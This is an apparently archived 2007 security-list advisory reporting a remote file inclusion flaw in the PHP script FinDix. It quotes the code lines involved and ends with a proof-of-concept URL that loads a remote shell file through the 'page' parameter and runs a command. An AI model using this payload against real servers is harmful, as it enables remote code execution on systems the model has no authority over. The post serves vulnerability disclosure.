FinDix Remote File Inclusion Vulnerability Aug 09 2007 01:41PM
rizgar linuxmail org
FinDix Remote File Inclusion Vulnerability
-----------------------------------------------------------------------

Script : FinDix

Site : http://ctw-design.com/styldiv/FindNix.zip

Founder : Rizgar

Contact : rizgar (at) linuxmail (dot) org [email concealed]

Thanks : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my heros :]

-----------------------------------------------------------------------

Okey now in the script found bug :

Line : 34-35

/*
* load page in content table
*/
if ($page == "")
$page = "start.htm"; //* change to your start page content.

/*

PoC :

http://www.site.com/findix/index.php?page=http://shell.txt?&cmd=id

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus